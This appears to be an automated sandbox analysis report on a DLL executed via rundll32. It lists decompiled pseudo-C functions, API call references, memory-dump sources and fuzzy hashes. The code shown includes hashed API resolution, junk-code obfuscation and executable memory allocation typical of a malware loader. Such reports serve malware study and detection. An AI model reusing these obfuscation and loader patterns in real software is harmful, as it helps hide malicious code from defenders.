			E6E1AB200(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				signed int _v32;
				intOrPtr _v36;
				intOrPtr _t32;
				signed char _t33;
				intOrPtr* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t42;
				void* _t43;
				signed int _t51;
				signed char _t53;
				signed char _t54;
				signed int _t58;
				intOrPtr* _t61;
				intOrPtr* _t62;
				signed int _t65;
				intOrPtr _t66;
				intOrPtr _t67;
				signed int _t70;
				void* _t71;
				void* _t72;
				void* _t73;
				void* _t76;
				void* _t79;
				intOrPtr* _t84;
				intOrPtr _t86;

				_t60 = __edx;
				_t32 = E6E19F060(__edx, _a8);
				_t72 = _t71 + 4;
				_v28 = _t32;
				_t81 = _t32;
				if(_t32 == 0) {
					L6:
					_t33 = 0;
				} else {
					_t68 = _a4;
					_t35 = E6E1A23F0(_t81, _a4);
					_t73 = _t72 + 4;
					_t61 = _t35;
					_t33 = 1;
					if(_t61 != 0) {
						if( *_t61 == 0) {
							goto L6;
						} else {
							_t62 = _t61 + 0x14;
							_t84 = _t62;
							_t54 = 0xdad1ca95;
							while(1) {
								_t38 = E6E191A10( *((intOrPtr*)(_t62 - 8)) + _t54, _t68);
								_t41 = E6E19E6F0(_t60, _t84, _a8, E6E194E30(0x4d4b0a36) + _t38);
								_t73 = _t73 + 0x14;
								if(_t41 == 0) {
									break;
								}
								_t86 =  *_t62;
								_t62 = _t62 + 0x14;
								_t68 = _a4;
								if(_t86 != 0) {
									continue;
								} else {
									goto L6;
								}
								goto L7;
							}
							_t58 =  *(_t62 - 0x14);
							_t42 = _a4;
							_v20 = _t58;
							_t70 =  *(_t58 + _t42);
							__eflags = _t70;
							if(__eflags == 0) {
								L12:
								_t33 = 1;
							} else {
								_v20 = _v20 + _t42;
								_t43 = E6E199090(__eflags, 0, _t42);
								_t76 = _t73 + 8;
								_v24 =  *((intOrPtr*)(_t62 - 4)) - _t43;
								_t65 = 0;
								__eflags = 0;
								0;
								0;
								while(1) {
									_v36 = _t65;
									_v32 = (_t70 ^ 0xffff0000) & _t70;
									E6E194740(__eflags, _t70, 0xffff);
									_t66 = _a4;
									E6E191A10(_t70, _t66);
									__eflags = _t70;
									_t20 = _t66 + 2; // 0x2
									_t67 = _v36;
									_t50 =  <  ? _v32 : _t70 + _t20;
									_t51 = E6E1A04E0(_t60, _t70, _v28,  <  ? _v32 : _t70 + _t20);
									_t79 = _t76 + 0x18;
									__eflags = _t51;
									_t54 = (_t54 ^ 0x00000001 | _t58 & 0xffffff00 | _t51 == 0x00000000) ^ 0x00000001;
									__eflags = _t51;
									_t58 = _v24;
									 *(_t58 + _t67) = _t51;
									if(__eflags == 0) {
										break;
									}
									_t70 =  *(_v20 + _t67 + 4);
									_t53 = E6E1977D0(__eflags, _t70, 0);
									_t76 = _t79 + 8;
									_t65 = _t67 + 4;
									__eflags = _t53 & 0x00000001;
									if(__eflags == 0) {
										continue;
									} else {
										goto L12;
									}
									goto L7;
								}
								_t33 = _t54;
							}
						}
					}
				}
				L7:
				return _t33 & 0x00000001;
			}

0x6e1ab200
0x6e1ab20c
0x6e1ab211
0x6e1ab214
0x6e1ab217
0x6e1ab219
0x6e1ab27b
0x6e1ab27b
0x6e1ab21b
0x6e1ab21b
0x6e1ab21f
0x6e1ab224
0x6e1ab227
0x6e1ab229
0x6e1ab22d
0x6e1ab232
0x00000000
0x6e1ab234
0x6e1ab234
0x6e1ab234
0x6e1ab237
0x6e1ab240
0x6e1ab247
0x6e1ab264
0x6e1ab269
0x6e1ab26e
0x00000000
0x00000000
0x6e1ab270
0x6e1ab273
0x6e1ab276
0x6e1ab279
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e1ab279
0x6e1ab287
0x6e1ab28a
0x6e1ab28d
0x6e1ab290
0x6e1ab293
0x6e1ab295
0x6e1ab333
0x6e1ab333
0x6e1ab29b
0x6e1ab29b
0x6e1ab2a4
0x6e1ab2a9
0x6e1ab2ae
0x6e1ab2b1
0x6e1ab2b1
0x6e1ab2b9
0x6e1ab2bd
0x6e1ab2c0
0x6e1ab2c0
0x6e1ab2cc
0x6e1ab2d5
0x6e1ab2dd
0x6e1ab2e2
0x6e1ab2ea
0x6e1ab2ec
0x6e1ab2f0
0x6e1ab2f3
0x6e1ab2fb
0x6e1ab300
0x6e1ab303
0x6e1ab30d
0x6e1ab310
0x6e1ab312
0x6e1ab315
0x6e1ab318
0x00000000
0x00000000
0x6e1ab31d
0x6e1ab324
0x6e1ab329
0x6e1ab32c
0x6e1ab32f
0x6e1ab331
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e1ab331
0x6e1ab33a
0x6e1ab33a
0x6e1ab295
0x6e1ab232
0x6e1ab22d
0x6e1ab27d
0x6e1ab286

Memory Dump Source

Source File: 00000004.00000002.656327415.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000004.00000002.656100230.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.658596682.000000006E1B5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.658831894.000000006E1B7000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.659217930.000000006E1BA000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5213ce09aa82906808e271b1109f5fe9b3c1ffd39c61ec354b238d645825e24e
Instruction ID: adc843024f8a571bfa07259099a3971b9821633cea6209416c3563a3a9ec1ca2
Opcode Fuzzy Hash: 5213ce09aa82906808e271b1109f5fe9b3c1ffd39c61ec354b238d645825e24e
Instruction Fuzzy Hash: 9731F6B6D0011A9BDF008AA8DC01BFF77B9AF51358F150526ED14A7305E731EA91EBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A5C80, Relevance: .1, Instructions: 102
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E6E1A5C80(intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v20;
				char _v24;
				intOrPtr _v28;
				intOrPtr _t22;
				void* _t23;
				void* _t27;
				intOrPtr* _t30;
				intOrPtr _t32;
				intOrPtr _t33;
				signed char _t37;
				intOrPtr* _t38;
				signed char _t40;
				intOrPtr _t41;
				intOrPtr* _t47;
				intOrPtr _t49;
				void* _t52;
				void* _t56;

				_t41 = _a16;
				_t22 = _a12;
				_t44 =  <=  ? _t22 : 0xa00000;
				_v28 =  <=  ? _t22 : 0xa00000;
				_v20 = 0;
				_t49 = 0;
				do {
					_t62 = _t41;
					if(_t41 == 0) {
						L3:
						_v24 = 0x40000;
						_t23 = E6E199090(_t63, _t49, 0xfa44397f);
						_t27 = E6E1B0260( &_v20, E6E191A10(_t23 + 0x40000, E6E194E30(0x92210622)));
						_t56 = _t52 + 0x1c;
						if(_t27 == 0) {
							break;
						}
						_t30 = E6E1B09C0(0x13, 0x7e90205);
						_t56 = _t56 + 8;
						_push( &_v24);
						_push(_v24);
						_push(_v20 + _t49);
						_push(_a4);
						if( *_t30() == 0) {
							break;
						}
						_t32 = _v24;
						if(_t32 == 0) {
							_t47 = _a8;
							__eflags = _t47;
							_t33 = _v20;
							if(_t47 == 0) {
								E6E1B02F0(_t33);
								return 1;
							}
							 *_t47 = _t33;
							 *((intOrPtr*)(_t47 + 4)) = _t49;
							return 1;
						}
						goto L6;
					}
					_t38 = E6E1B09C0(0, 0x79eae4);
					_t40 = E6E1977D0(_t62,  *_t38(_t41, 0), 0x102);
					_t56 = _t52 + 0x10;
					_t63 = _t40 & 0x00000001;
					if((_t40 & 0x00000001) == 0) {
						break;
					}
					goto L3;
					L6:
					_t49 = _t49 + _t32;
					_t37 = E6E191480(_t49, _v28);
					_t52 = _t56 + 8;
				} while ((_t37 & 0x00000001) == 0);
				E6E1B02F0(_v20);
				return 0;
			}

0x6e1a5c89
0x6e1a5c8c
0x6e1a5c9d
0x6e1a5ca0
0x6e1a5ca3
0x6e1a5caa
0x6e1a5cb0
0x6e1a5cb0
0x6e1a5cb2
0x6e1a5cde
0x6e1a5cde
0x6e1a5ceb
0x6e1a5d17
0x6e1a5d1c
0x6e1a5d21
0x00000000
0x00000000
0x6e1a5d2a
0x6e1a5d2f
0x6e1a5d3a
0x6e1a5d3b
0x6e1a5d3e
0x6e1a5d3f
0x6e1a5d46
0x00000000
0x00000000
0x6e1a5d48
0x6e1a5d4d
0x6e1a5d7a
0x6e1a5d7d
0x6e1a5d7f
0x6e1a5d82
0x6e1a5d8e
0x00000000
0x6e1a5d96
0x6e1a5d84
0x6e1a5d86
0x00000000
0x6e1a5d89
0x00000000
0x6e1a5d4d
0x6e1a5cbb
0x6e1a5cce
0x6e1a5cd3
0x6e1a5cd6
0x6e1a5cd8
0x00000000
0x00000000
0x00000000
0x6e1a5d4f
0x6e1a5d4f
0x6e1a5d55
0x6e1a5d5a
0x6e1a5d5d
0x6e1a5d68
0x00000000

Memory Dump Source

Source File: 00000004.00000002.656327415.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000004.00000002.656100230.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.658596682.000000006E1B5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.658831894.000000006E1B7000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.659217930.000000006E1BA000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25ec6c36c532534a9e39a3aa81a366c660ac64df3cc36af57fb3c4de5dca7043
Instruction ID: 207d54b06ff4992f53d75332447a418c3b9f319d32c50acc78d7ab598683ff08
Opcode Fuzzy Hash: 25ec6c36c532534a9e39a3aa81a366c660ac64df3cc36af57fb3c4de5dca7043
Instruction Fuzzy Hash: A121C5B5D042066BEF00DEE4AD55BFF73AC9F61308F140438E919B7241F7319995A6A2

Uniqueness

Uniqueness Score: -1.00%

Function 6E19FA10, Relevance: .1, Instructions: 99
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E19FA10(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				signed int _v32;
				intOrPtr _v36;
				intOrPtr* _v40;
				signed char _t38;
				signed int _t43;
				void* _t45;
				void* _t47;
				signed int _t49;
				signed char _t52;
				intOrPtr* _t58;
				intOrPtr _t59;
				signed int _t62;
				void* _t63;
				intOrPtr _t65;
				signed int _t66;
				void* _t68;
				void* _t71;
				void* _t83;

				_t77 = __eflags;
				_t62 = _a4;
				_t65 = E6E1AADC0(__eflags, _t62);
				_v28 = E6E199090(_t77,  *((intOrPtr*)(_t65 + 0x1c)),  ~_t62);
				_t56 =  >  ?  *((intOrPtr*)(_t65 + 0x14)) :  *((intOrPtr*)(_t65 + 0x18));
				_v36 =  >  ?  *((intOrPtr*)(_t65 + 0x14)) :  *((intOrPtr*)(_t65 + 0x18));
				_t38 = E6E1977D0( *((intOrPtr*)(_t65 + 0x14)) -  *((intOrPtr*)(_t65 + 0x18)),  >  ?  *((intOrPtr*)(_t65 + 0x14)) :  *((intOrPtr*)(_t65 + 0x18)), 0);
				_t71 = _t68 + 0x14;
				if((_t38 & 0x00000001) != 0) {
					L7:
					return 0;
				}
				_v24 = _t65;
				_t58 =  *((intOrPtr*)(_t65 + 0x24)) + _t62;
				_v20 = _a8 & 0x0000ffff;
				_t63 = 0;
				while(1) {
					_v40 = _t58;
					_t66 = 0;
					if( *_t58 == (_a8 & 0x0000ffff)) {
						_t52 =  *(_v24 + 0x10);
						_t49 = E6E194E30(0x6865c0a2);
						_t71 = _t71 + 4;
						_t66 =  *((intOrPtr*)(_v28 + (_v20 - (_t49 & _t52)) * 4));
					}
					_t63 = _t63 - E6E194E30(0xdd9a0107) + 0xb5ff3e5b;
					_t83 = _t63 - _v36;
					_v32 = _t66;
					_t43 = E6E1977D0(_t83, _t66, 0);
					_t71 = _t71 + 0xc;
					_t52 = (_t52 & 0xffffff00 | _t83 > 0x00000000) ^ _t43;
					_t59 = _v40;
					if((_t52 & 0x00000001) != 0) {
						break;
					}
					_t58 = _t59 + 2;
					_t85 = _t43 & 0x00000001;
					if((_t43 & 0x00000001) != 0) {
						continue;
					}
					break;
				}
				_t45 = E6E191A10(E6E191A10(_v32, 0x200c9ca1), _a4);
				_t47 = E6E199090(_t85, _t45, E6E194E30(0x4869a3fc));
				if((_t43 & 0x00000001) != 0) {
					goto L7;
				}
				return _t47;
			}

0x6e19fa10
0x6e19fa19
0x6e19fa25
0x6e19fa37
0x6e19fa42
0x6e19fa47
0x6e19fa4b
0x6e19fa50
0x6e19fa55
0x6e19fb17
0x00000000
0x6e19fb17
0x6e19fa5b
0x6e19fa61
0x6e19fa67
0x6e19fa6a
0x6e19fa70
0x6e19fa74
0x6e19fa7a
0x6e19fa7f
0x6e19fa84
0x6e19fa8c
0x6e19fa91
0x6e19fa9e
0x6e19fa9e
0x6e19fab0
0x6e19fab6
0x6e19fabe
0x6e19fac2
0x6e19fac7
0x6e19faca
0x6e19facf
0x6e19fad2
0x00000000
0x00000000
0x6e19fad4
0x6e19fad7
0x6e19fad9
0x00000000
0x00000000
0x00000000
0x6e19fad9
0x6e19faf1
0x6e19fb0a
0x6e19fb15
0x00000000
0x00000000
0x6e19fb20

Memory Dump Source

Source File: 00000004.00000002.656327415.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000004.00000002.656100230.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.658596682.000000006E1B5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.658831894.000000006E1B7000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.659217930.000000006E1BA000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87225877571b391e09bbd36413dee388fb3ffb24994ce6bc1594547f9113c888
Instruction ID: c58cd49bf21ce1c36ba0102d4cb8740d3536ac49a2bfe05c50bfadc41c1221c8
Opcode Fuzzy Hash: 87225877571b391e09bbd36413dee388fb3ffb24994ce6bc1594547f9113c888
Instruction Fuzzy Hash: 0131C2B6E001046FDB00DFB4EC41AFE77B9AF54258F180429EC19A7341E7369E94E7A1

Uniqueness

Uniqueness Score: -1.00%

Function 6E1C4891, Relevance: 7.8, APIs: 5, Instructions: 301COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.659529604.000000006E1BB000.00000020.00020000.sdmp, Offset: 6E1BB000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 311543b304ea481aa106fe1578941e9ce19631a3b08d0f42972e2328476db96e
Instruction ID: 11125ce987b73b9cd37b5304a2e7fce00f07f5c7c0eaf0aa5bacbf40afa12216
Opcode Fuzzy Hash: 311543b304ea481aa106fe1578941e9ce19631a3b08d0f42972e2328476db96e
Instruction Fuzzy Hash: F2C11374A082499FDF01CFD9C884BEEBBB5BF6A704F114058E611E7291C7789983DB62

Uniqueness

Uniqueness Score: -1.00%

Function 6E1952C0, Relevance: 6.1, APIs: 4, Instructions: 135
windowmemoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E1952C0(WCHAR* _a4, WCHAR* _a8) {
				signed int _v17;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				long _v40;
				signed int _v44;
				signed int _v48;
				WCHAR* _v52;
				int _v56;
				intOrPtr _v60;
				struct _SECURITY_ATTRIBUTES* _t70;
				signed int _t76;
				signed char _t78;
				signed int _t80;
				int _t81;
				signed int _t87;
				WCHAR* _t88;
				long _t93;
				signed int _t96;
				signed int _t97;
				intOrPtr _t99;
				signed int _t100;
				long _t104;
				signed int _t106;
				signed int _t107;
				signed int _t110;
				signed int _t111;
				signed int _t112;
				struct HWND__* _t114;
				long _t115;
				signed int _t117;
				WCHAR* _t118;
				WCHAR* _t119;
				WCHAR* _t120;

				_t119 = _a8;
				_t120 = _a4;
				_t70 = _t119 + (_t119 + _t119 * 0x00000004) * 0x00000004 + _t119 & _t119;
				_v28 = _t70;
				_t104 = _t70 | _t120;
				_v24 = _t104;
				CreateFileMappingW(_t119, _t70, _t104, _t70, _t119, _t120);
				_v36 = _v24 + _v28;
				_t76 = _v36 ^ _t120 | _t120;
				_t106 = _t76 * _t119;
				_v28 = _t106;
				_t107 = _t119 + _t106;
				_v40 = _t107;
				_v24 = _t107 ^ _t76;
				if(_t119 == 0x7cffd2ac && _t120 != _v28) {
					_t93 = _v24;
					_v44 = _t119 + _t93;
					VirtualAlloc(_v28, _v40, _t93, _t120);
					_t96 = _v44 ^ 0x00000013;
					_v36 = _t96;
					_t97 = _t96 * _v24;
					_v32 = _t97;
					_v24 = _t97 - _t120;
				}
				if(_t120 == 0x58a6dd19 && _t119 != _v36 && _t119 == _v40 && _t120 == _v28) {
					_t115 = _v40;
					_t87 = _v24 - _v28 + _t115;
					_v36 = _t87;
					_t118 = _t87 + _t115;
					_v52 = _t118;
					_t88 = _t115 + _t87 + 0x2bc;
					_v48 = _t88;
					MessageBoxW(_v44, _t118, _t88, _t118);
					_v44 = 0x100;
					_v17 = (0x00000100 | _v48) & _v28;
				}
				if(_t120 == 0x1905141 && _t119 != _t120 && _t120 == _v32 && _t120 != _v28) {
					_t114 = _v24;
					_t80 = _v17 ^ _t114;
					_v52 = _t80;
					_t81 = _t80 - _t120;
					_v56 = _t81;
					_t117 = _v48;
					_t99 = _t81 + _t117;
					_v60 = _t99;
					_t100 = _t99 + _t114;
					_v17 = _t100;
					_v32 = _t100 + _t117;
					MessageBoxW(_t114, _t120, _t119, _t81);
					_v17 = _v32 + _v48;
				}
				if(_t120 == 0x2884923c && _t119 <= _v32 && _t120 != _v32) {
					_t78 = _v17;
					_t110 = _v24 + _t78;
					_v32 = _t110;
					_t111 = _t110 | 0x00001000;
					_v24 = _t111;
					_t112 = _t111 ^ 0x00000292;
					_v36 = _t112;
					_v40 = _t112 + _t78;
				}
				return _v40;
			}

0x6e1952c9
0x6e1952cc
0x6e1952d7
0x6e1952d9
0x6e1952de
0x6e1952e0
0x6e1952e9
0x6e1952f5
0x6e1952fd
0x6e195301
0x6e195304
0x6e195307
0x6e195309
0x6e19530e
0x6e195317
0x6e19531e
0x6e195324
0x6e19532f
0x6e195338
0x6e19533b
0x6e19533e
0x6e195342
0x6e195347
0x6e195347
0x6e195350
0x6e195367
0x6e19536a
0x6e19536c
0x6e19536f
0x6e195372
0x6e195375
0x6e19537c
0x6e195385
0x6e195393
0x6e195399
0x6e195399
0x6e1953a2
0x6e1953b6
0x6e1953b9
0x6e1953bb
0x6e1953be
0x6e1953c0
0x6e1953c3
0x6e1953c6
0x6e1953c9
0x6e1953cc
0x6e1953ce
0x6e1953d6
0x6e1953dd
0x6e1953e9
0x6e1953e9
0x6e1953f2
0x6e1953fe
0x6e195405
0x6e195407
0x6e19540a
0x6e195410
0x6e195413
0x6e195419
0x6e19541e
0x6e19541e
0x6e19542b

APIs

CreateFileMappingW.KERNEL32(6E192D3E,?,?,?,6E192D3E,?,?,?,?,?,?,?,?,?,6E192D3E,?), ref: 6E1952E9
VirtualAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6E192D3E,?,?), ref: 6E19532F
MessageBoxW.USER32(?,?,?), ref: 6E195385
MessageBoxW.USER32(?,?,6E192D3E,?), ref: 6E1953DD

Memory Dump Source

Source File: 00000004.00000002.656327415.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000004.00000002.656100230.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.658596682.000000006E1B5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.658831894.000000006E1B7000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.659217930.000000006E1BA000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Message$AllocCreateFileMappingVirtual
String ID:
API String ID: 3198829672-0
Opcode ID: 34c39196c59b6fc5979379143f805e87dca158e66e76a8e82e7e7cf7b6a89946
Instruction ID: 42ec3963bdb82a9061abb34e9821710b3ce1deb6bd4857c681038dcd288721bb
Opcode Fuzzy Hash: 34c39196c59b6fc5979379143f805e87dca158e66e76a8e82e7e7cf7b6a89946
Instruction Fuzzy Hash: EB510371D1012ADFCF54DFA8C8959EEFBB9EF48311F24806AE814B3200D3746A859BA4

Uniqueness

Uniqueness Score: -1.00%

Function 6E195DC0, Relevance: 6.1, APIs: 4, Instructions: 99
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E195DC0(int _a4) {
				char _v9;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				WCHAR* _t47;
				signed int _t53;
				signed int _t54;
				char _t55;
				int _t56;
				signed int _t60;
				signed int _t63;
				signed int _t66;
				signed int _t70;
				signed int _t72;
				WCHAR* _t73;
				signed int _t76;
				struct HWND__* _t77;
				signed int _t80;
				signed int _t83;
				intOrPtr _t84;
				struct tagRECT* _t85;
				signed int _t87;
				signed int _t89;
				signed int _t91;
				signed int _t92;
				int _t96;

				_t96 = _a4;
				_t47 = _t96 ^ 0x000003e1;
				_v24 = _t47;
				_t72 = _t47 + _t96;
				_v16 = _t72;
				_t73 = _t72 + _t47;
				_v20 = _t73;
				lstrcmpiW(_t47, _t73);
				_v24 = _v20 - _t96;
				if(_t96 == _v16 && _t96 != _v16 && _t96 != _v16) {
					_t70 = _v24 * _t96 ^ _v16;
					_v16 = _t70;
					_v20 = _t70 | 0x00000001;
				}
				_t76 = _v20 ^ _v16 | _v16;
				_v16 = _t76;
				_t77 = _t76 ^ 0x0000010c;
				_v24 = _t77;
				GetParent(_t77);
				_t53 = _v20;
				_t80 = _v24 * _t53 + _t53;
				_v24 = _t80;
				_v16 = _t80 & _t53;
				_t54 = _v16;
				_t83 = _v20 ^ _t54;
				_t91 = _t83 * 0xdc + _t54;
				_v16 = _t91;
				_t92 = _t91 ^ _t83;
				_v20 = _t92;
				_v24 = _t92 ^ _t96;
				if(_t96 == 0xbb1b6b43 && _t96 == _v20 && _t96 != _v16) {
					GetCommandLineW();
					_t63 = _v24;
					_t89 = _t63 * 0x170;
					_v16 = _t89;
					_t66 = _t63 * _t89 + _t96;
					_v28 = _t66;
					_v9 = _t66 ^ _t89;
				}
				_t55 = _v9;
				_t84 = _t55 + _t96;
				_v32 = _t84;
				_t85 = _t84 + _t55;
				_v20 = _t85;
				_t56 = _v16;
				_v9 = _t85 * _t56;
				InflateRect(_t85, _t56, _t96);
				_t60 = _v9 + 0xc2;
				_v24 = _t60;
				_t87 = _v16 * _t60;
				_v28 = _t87;
				_v20 = _t87 ^ _t60;
				return _v20;
			}

0x6e195dc7
0x6e195dcc
0x6e195dd1
0x6e195dd4
0x6e195dd7
0x6e195dda
0x6e195ddc
0x6e195de1
0x6e195dec
0x6e195df2
0x6e195e04
0x6e195e07
0x6e195e0d
0x6e195e0d
0x6e195e18
0x6e195e1a
0x6e195e1d
0x6e195e23
0x6e195e27
0x6e195e2d
0x6e195e36
0x6e195e38
0x6e195e3d
0x6e195e40
0x6e195e46
0x6e195e4e
0x6e195e50
0x6e195e53
0x6e195e55
0x6e195e5a
0x6e195e63
0x6e195e6f
0x6e195e75
0x6e195e78
0x6e195e7e
0x6e195e87
0x6e195e89
0x6e195e8e
0x6e195e8e
0x6e195e91
0x6e195e95
0x6e195e98
0x6e195e9b
0x6e195e9d
0x6e195ea0
0x6e195ea8
0x6e195eae
0x6e195eb9
0x6e195ebc
0x6e195ec2
0x6e195ec5
0x6e195eca
0x6e195ed5

APIs

lstrcmpiW.KERNEL32(6E192AEF,?,?,?,?,?,6E192AEF,?,?,?,?,?,?,?,?,6E19222A), ref: 6E195DE1
GetParent.USER32(?), ref: 6E195E27
GetCommandLineW.KERNEL32(?,?,?,?,6E192AEF,?,?,?,?,?,?,?,?,6E19222A), ref: 6E195E6F
InflateRect.USER32(?,?,?), ref: 6E195EAE

Memory Dump Source

Source File: 00000004.00000002.656327415.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000004.00000002.656100230.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.658596682.000000006E1B5000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.658831894.000000006E1B7000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.659217930.000000006E1BA000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CommandInflateLineParentRectlstrcmpi
String ID:
API String ID: 4065909697-0
Opcode ID: 7492dbfc8accc15286fcd79f703a1355e37bb9e7a73222bd2ef4dfe766336c20
Instruction ID: 45d2de3c73bdf3bd58a80a0d208c816f475b25e3fe5f006d162d8b8b73576eb7
Opcode Fuzzy Hash: 7492dbfc8accc15286fcd79f703a1355e37bb9e7a73222bd2ef4dfe766336c20
Instruction Fuzzy Hash: 0A41D371E0411A9FCF48DFA8C9569EEFBB5FB18300F11846ED865F7340D674AA409BA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E1C4010, Relevance: 6.1, APIs: 4, Instructions: 51COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?), ref: 6E1C4026
GetLastError.KERNEL32(?,?,?), ref: 6E1C4030
SetFilePointerEx.KERNEL32(?,?,?,?,?), ref: 6E1C4055
SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,?,?,?), ref: 6E1C407B

Memory Dump Source

Source File: 00000004.00000002.659529604.000000006E1BB000.00000020.00020000.sdmp, Offset: 6E1BB000, based on PE: false

Similarity

API ID: FilePointer$ErrorLast
String ID:
API String ID: 142388799-0
Opcode ID: ea665139204081d5e3175fa1df184e57b0d501f1a987d80634b0a3d7cb048485
Instruction ID: e1cc7fa64272970b6d9d5e4fee94cdc282946b0315b1dd0cbb6d0c853878cd28
Opcode Fuzzy Hash: ea665139204081d5e3175fa1df184e57b0d501f1a987d80634b0a3d7cb048485
Instruction Fuzzy Hash: A9016D71915518BBDF10AFE1CC489DF7F7EEF11B60F108608F425A2190D7358AA2EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E1C638D, Relevance: 6.0, APIs: 4, Instructions: 32COMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(?,?,?,00000000), ref: 6E1C63A7
GetLastError.KERNEL32 ref: 6E1C63B3

Part of subcall function 6E1C645C: CloseHandle.KERNEL32(6E2128B0,6E1C64A6,?,?,6E1C4201,?,00000001,6E1C414A,?,?,6E1C414A,?), ref: 6E1C646C

___initconout.LIBCMT ref: 6E1C63C3

Part of subcall function 6E1C641E: CreateFileW.KERNEL32(6E20ACE8,40000000,00000003,00000000,00000003,00000000,00000000,6E1C644D,6E1C41EE,?,?,6E1C414A,?), ref: 6E1C6431

WriteConsoleW.KERNEL32(?,?,?,00000000), ref: 6E1C63D7

Memory Dump Source

Source File: 00000004.00000002.659529604.000000006E1BB000.00000020.00020000.sdmp, Offset: 6E1BB000, based on PE: false

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 6b5129dbf02877df59ec2cadea589cff12d736338dfa6d69c2a4ee061226db20
Instruction ID: 2f56668476ab47f663bb4e00d5b5af7f1095aad2277f4f36521cd334c4327eb0
Opcode Fuzzy Hash: 6b5129dbf02877df59ec2cadea589cff12d736338dfa6d69c2a4ee061226db20
Instruction Fuzzy Hash: 6CF0823A120948ABCF221BD5DC08D867FFBEFEAB11711441DF659D2520CB729892EB71

Uniqueness

Uniqueness Score: -1.00%

Function 6E1C6473, Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(?,?,6E1C414A,00000000,?,?,6E1C4201,?,00000001,6E1C414A,?,?,6E1C414A,?), ref: 6E1C648A
GetLastError.KERNEL32(?,?,6E1C4201,?,00000001,6E1C414A,?,?,6E1C414A,?), ref: 6E1C6496

Part of subcall function 6E1C645C: CloseHandle.KERNEL32(6E2128B0,6E1C64A6,?,?,6E1C4201,?,00000001,6E1C414A,?,?,6E1C414A,?), ref: 6E1C646C

___initconout.LIBCMT ref: 6E1C64A6

Part of subcall function 6E1C641E: CreateFileW.KERNEL32(6E20ACE8,40000000,00000003,00000000,00000003,00000000,00000000,6E1C644D,6E1C41EE,?,?,6E1C414A,?), ref: 6E1C6431

WriteConsoleW.KERNEL32(?,?,6E1C414A,00000000,?,?,6E1C4201,?,00000001,6E1C414A,?,?,6E1C414A,?), ref: 6E1C64BB

Memory Dump Source

Source File: 00000004.00000002.659529604.000000006E1BB000.00000020.00020000.sdmp, Offset: 6E1BB000, based on PE: false

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: a7477048ce343644ddddd2068779a7e095f66c1f345cbd9666fb55682d8e9e1b
Instruction ID: 2ee265158a8022126f1e7b074e87a4d77acb4f9b7dd45d172304b8ffd9ebdd89
Opcode Fuzzy Hash: a7477048ce343644ddddd2068779a7e095f66c1f345cbd9666fb55682d8e9e1b
Instruction Fuzzy Hash: 76F0123611051DBBCF122FD1CC08DDA3FA7FB2AB61B054014FB1895150C6368965EBA1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 6636 Parent PID: 6588 rundll32.exeCOMMON

Executed Functions

Function 6E2144D9, Relevance: 13.8, APIs: 9, Instructions: 318memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,00000917,00003000,00000040,00000917,6E213F30), ref: 6E214596
VirtualAlloc.KERNEL32(00000000,00000818,00003000,00000040,6E213F92), ref: 6E2145CD
